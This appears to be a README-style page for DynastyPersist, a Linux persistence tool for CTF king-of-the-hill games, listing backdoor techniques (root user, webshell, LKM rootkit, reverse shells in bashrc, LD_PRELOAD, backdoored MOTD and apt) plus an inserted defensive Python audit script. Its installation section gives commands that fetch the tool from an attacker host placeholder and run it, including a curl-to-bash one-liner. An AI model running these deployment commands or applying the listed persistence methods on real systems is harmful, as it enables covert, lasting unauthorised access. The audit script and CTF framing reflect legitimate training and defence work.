DynastyPersist: A Linux persistence tool
A CTF Tool for Linux persistence (KOTH, Battlegrounds)
A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.
Features
- SSH Key Generation: Automatically generates SSH keys for covert access.
- Cronjob Persistence: Sets up cronjobs for scheduled persistence.
- Custom User with Root: Creates a custom user with root privileges.
- RCE Persistence: Achieves persistence through remote code execution (php webshell).
- LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.
- Bashrc Persistence: Modifies user-specific shell initialization files for persistence (aliases / reverse shells).
- Systemd Service for Root: Sets up a systemd service for achieving root persistence.
- LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.
- Backdooring Message of the Day / Header: Backdoors system message display for covert access.
- Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.
- Backdoors APT Command: Backdoors apt command to pop up a shell.
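For defenders reviewing a host after a KOTH round or an assessment, the feature list above maps to a small set of files worth auditing. The following is an added example, not code from DynastyPersist: the watched paths, the `audit` function and the seven-day window are assumptions based on standard Linux locations.

```python
import glob
import os
import time

# Locations the feature list above implies. Standard Linux paths chosen for
# this example (an assumption); they are not taken from DynastyPersist's code.
WATCH = [
    "etc/crontab", "etc/cron.d/*", "var/spool/cron/**/*",
    "etc/systemd/system/**/*.service", "etc/motd", "etc/update-motd.d/*",
    "etc/apt/apt.conf.d/*", "etc/ld.so.preload", "etc/sudoers", "etc/sudoers.d/*",
    "root/.bashrc", "root/.ssh/authorized_keys",
    "home/*/.bashrc", "home/*/.ssh/authorized_keys",
]

def read(path):
    """Return file text, or an empty string if the file is missing or unreadable."""
    try:
        with open(path, errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""

def audit(root="/", since_days=7):
    """Return (check, path, detail) findings for a live or mounted filesystem."""
    findings = []
    # 1. Any account other than root that carries UID 0.
    passwd = os.path.join(root, "etc/passwd")
    for fields in (line.split(":") for line in read(passwd).splitlines()):
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            findings.append(("uid0-account", passwd, fields[0]))
    # 2. A non-empty global preload file loads a library into every process.
    preload = os.path.join(root, "etc/ld.so.preload")
    if read(preload).strip():
        findings.append(("ld-preload", preload, read(preload).strip()))
    # 3. Active sudoers lines that mention LD_PRELOAD (for example via env_keep).
    sudoers = glob.glob(os.path.join(root, "etc/sudoers")) + \
        glob.glob(os.path.join(root, "etc/sudoers.d/*"))
    for path in sudoers:
        for line in read(path).splitlines():
            if "LD_PRELOAD" in line and not line.lstrip().startswith("#"):
                findings.append(("sudoers-ld-preload", path, line.strip()))
    # 4. Watched files changed inside the review window.
    cutoff = time.time() - since_days * 86400
    for pattern in WATCH:
        for path in glob.glob(os.path.join(root, pattern), recursive=True):
            if os.path.isfile(path) and os.path.getmtime(path) >= cutoff:
                stamp = time.ctime(os.path.getmtime(path))
                findings.append(("recent-change", path, stamp))
    return findings
```

Where possible, run it as root against a mounted disk image (`audit("/mnt/image")`) rather than the live host: a loaded LKM rootkit can hide files from userland, and modification times can be reset, so an empty result does not prove the host is clean.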
Installation
- Clone this repository to your local machine:
$ git clone https://github.com/Trevohack/DynastyPersist.git
$ python3 -m http.server 8080
root@tyler.thm~$ cd /opt && wget -c [ATTACKER-IP]:8080/DynastyPersist && cd DynastyPersist && chmod +x dynasty.sh && ./dynasty.sh <ATTACKER_IP> <PORT>
- One-liner:
curl -sSL [ATTACKER_IP]:8080/DynastyPersist/dynasty.sh <ATTACKER_IP> <PORT> | bash
Copyright (C) 2024
Source: https://github.com/Trevohack/